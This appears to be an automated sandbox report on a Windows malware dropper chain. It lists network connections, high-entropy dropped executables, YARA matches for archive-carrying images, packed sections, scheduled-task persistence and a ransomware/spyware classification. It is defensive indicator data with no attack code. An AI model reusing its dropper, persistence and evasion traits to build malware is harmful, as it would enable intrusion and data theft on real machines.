                              Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49814 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49822 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49823 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49831 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49832 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49837 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49843 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49844 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49852 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49858 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49863 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49875 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49876 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49874 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.4:49882 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.4:49884 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49885 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49897 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49899 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49904 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49908 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49916 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50060 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50068 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50120 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50125 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50128 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50134 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50140 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50141 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50157 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50158 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50162 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50168 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50169 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50174 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50177 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50180 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.89.115:443 -> 192.168.2.4:50185 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50186 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50189 version: TLS 1.2

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe entropy: 7.99505709583Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe entropy: 7.99505709583Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\output[1].png entropy: 7.99450935401Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f entropy: 7.99450935401Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip entropy: 7.99352358954Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png entropy: 7.99450935401Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeFile created: C:\Users\user\AppData\Local\Temp\main\file.bin entropy: 7.99994867689Jump to dropped file
                              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\main\file.zip (copy) entropy: 7.99994867689Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip entropy: 7.9992359396Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip entropy: 7.99771683584Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip entropy: 7.99772074518Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\fuckingdllENCR[1].dll entropy: 7.99823177189Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip entropy: 7.99772354314Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip entropy: 7.99772670895Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip entropy: 7.99772941561Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip entropy: 7.99773141174Jump to dropped file

                              System Summary

                              barindex
                              Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                              Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                              Source: 2e4e1b8516.exe, 0000002D.00000000.3476591551.00000000006A2000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1c72478d-5
                              Source: 2e4e1b8516.exe, 0000002D.00000000.3476591551.00000000006A2000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_715eacc6-a
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile dump: service123.exe.19.dr 314617856Jump to dropped file
                              Source: file.bin.24.drZip Entry: encrypted
                              Source: file.exeStatic PE information: section name:
                              Source: file.exeStatic PE information: section name: .idata
                              Source: skotes.exe.0.drStatic PE information: section name:
                              Source: skotes.exe.0.drStatic PE information: section name: .idata
                              Source: random[1].exe1.5.drStatic PE information: section name:
                              Source: random[1].exe1.5.drStatic PE information: section name: .idata
                              Source: random[1].exe1.5.drStatic PE information: section name:
                              Source: 5cda6c90d7.exe.5.drStatic PE information: section name:
                              Source: 5cda6c90d7.exe.5.drStatic PE information: section name: .idata
                              Source: 5cda6c90d7.exe.5.drStatic PE information: section name:
                              Source: cc6b47fc15.exe.5.drStatic PE information: section name:
                              Source: cc6b47fc15.exe.5.drStatic PE information: section name: .idata
                              Source: cc6b47fc15.exe.5.drStatic PE information: section name:
                              Source: random[2].exe0.5.drStatic PE information: section name:
                              Source: random[2].exe0.5.drStatic PE information: section name: .idata
                              Source: random[2].exe0.5.drStatic PE information: section name:
                              Source: b6638733e4.exe.5.drStatic PE information: section name:
                              Source: b6638733e4.exe.5.drStatic PE information: section name: .idata
                              Source: b6638733e4.exe.5.drStatic PE information: section name:
                              Source: random[2].exe1.5.drStatic PE information: section name:
                              Source: random[2].exe1.5.drStatic PE information: section name: .idata
                              Source: random[2].exe1.5.drStatic PE information: section name:
                              Source: b05c9e01f3.exe.5.drStatic PE information: section name:
                              Source: b05c9e01f3.exe.5.drStatic PE information: section name: .idata
                              Source: b05c9e01f3.exe.5.drStatic PE information: section name:
                              Source: random[2].exe2.5.drStatic PE information: section name:
                              Source: random[2].exe2.5.drStatic PE information: section name: .idata
                              Source: random[2].exe2.5.drStatic PE information: section name:
                              Source: c9d0f96e57.exe.5.drStatic PE information: section name:
                              Source: c9d0f96e57.exe.5.drStatic PE information: section name: .idata
                              Source: c9d0f96e57.exe.5.drStatic PE information: section name:
                              Source: random[4].exe.5.drStatic PE information: section name:
                              Source: random[4].exe.5.drStatic PE information: section name: .idata
                              Source: random[4].exe.5.drStatic PE information: section name:
                              Source: 142c991362.exe.5.drStatic PE information: section name:
                              Source: 142c991362.exe.5.drStatic PE information: section name: .idata
                              Source: 142c991362.exe.5.drStatic PE information: section name:
                              Source: random[3].exe1.5.drStatic PE information: section name:
                              Source: random[3].exe1.5.drStatic PE information: section name: .idata
                              Source: 35f0a75b93.exe.5.drStatic PE information: section name:
                              Source: 35f0a75b93.exe.5.drStatic PE information: section name: .idata
                              Source: random[3].exe2.5.drStatic PE information: section name:
                              Source: random[3].exe2.5.drStatic PE information: section name: .idata
                              Source: 54682ac64c.exe.5.drStatic PE information: section name:
                              Source: 54682ac64c.exe.5.drStatic PE information: section name: .idata
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile created: C:\Windows\Tasks\Gxtuum.job
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008978BB0_2_008978BB
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008970490_2_00897049
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008988600_2_00898860
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008931A80_2_008931A8
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00854B300_2_00854B30
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00854DE00_2_00854DE0
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00892D100_2_00892D10
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089779B0_2_0089779B
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00887F360_2_00887F36
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009E78BB1_2_009E78BB
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009E70491_2_009E7049
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009E88601_2_009E8860
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009E31A81_2_009E31A8
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009A4B301_2_009A4B30
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009A4DE01_2_009A4DE0
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009E2D101_2_009E2D10
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009E779B1_2_009E779B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009D7F361_2_009D7F36
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_003310008_2_00331000
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_00334C8C8_2_00334C8C
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_00346F3A8_2_00346F3A
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_0033100010_2_00331000
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_00334C8C10_2_00334C8C
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_00346F3A10_2_00346F3A
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00D8C90C11_3_00D8C90C
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00D8D10011_3_00D8D100
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: Security
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: String function: 00335190 appears 92 times
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: String function: 0033B767 appears 42 times
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: String function: 0033F534 appears 34 times
                              Source: C:\Users\user\Desktop\file.exeCode function: String function: 008680C0 appears 130 times
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 009B80C0 appears 130 times
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                              Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                              Source: Y-Cleaner.exe.31.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: soft[1].31.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: random[1].exe0.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                              Source: random[1].exe0.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                              Source: cd2469328d.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                              Source: cd2469328d.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                              Source: random[1].exe1.5.drStatic PE information: Section: ZLIB complexity 0.9974582619863014
                              Source: random[1].exe1.5.drStatic PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
                              Source: 5cda6c90d7.exe.5.drStatic PE information: Section: ZLIB complexity 0.9974582619863014
                              Source: 5cda6c90d7.exe.5.drStatic PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
                              Source: cc6b47fc15.exe.5.drStatic PE information: Section: ZLIB complexity 0.9974582619863014
                              Source: cc6b47fc15.exe.5.drStatic PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
                              Source: random[2].exe0.5.drStatic PE information: Section: dsmoqcnp ZLIB complexity 0.9944011532419309
                              Source: b6638733e4.exe.5.drStatic PE information: Section: dsmoqcnp ZLIB complexity 0.9944011532419309
                              Source: random[2].exe1.5.drStatic PE information: Section: wasfhoet ZLIB complexity 0.9943352085127763
                              Source: b05c9e01f3.exe.5.drStatic PE information: Section: wasfhoet ZLIB complexity 0.9943352085127763
                              Source: random[2].exe2.5.drStatic PE information: Section: tsdsdsrb ZLIB complexity 0.9900423479190835
                              Source: c9d0f96e57.exe.5.drStatic PE information: Section: tsdsdsrb ZLIB complexity 0.9900423479190835
                              Source: random[4].exe.5.drStatic PE information: Section: ZLIB complexity 0.9973311750856164
                              Source: random[4].exe.5.drStatic PE information: Section: ltyimmoj ZLIB complexity 0.9946100175144684
                              Source: 142c991362.exe.5.drStatic PE information: Section: ZLIB complexity 0.9973311750856164
                              Source: 142c991362.exe.5.drStatic PE information: Section: ltyimmoj ZLIB complexity 0.9946100175144684
                              Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@160/109@40/20
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Program Files\Google\Chrome\Extensions
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeMutant created: \Sessions\1\BaseNamedObjects\48cb35e3030a2b429c6ac414faba9b49
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCommand line argument: .38_2_0033E280
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCommand line argument: .310_2_0033E280
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSystem information queried: HandleInformationJump to behavior
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
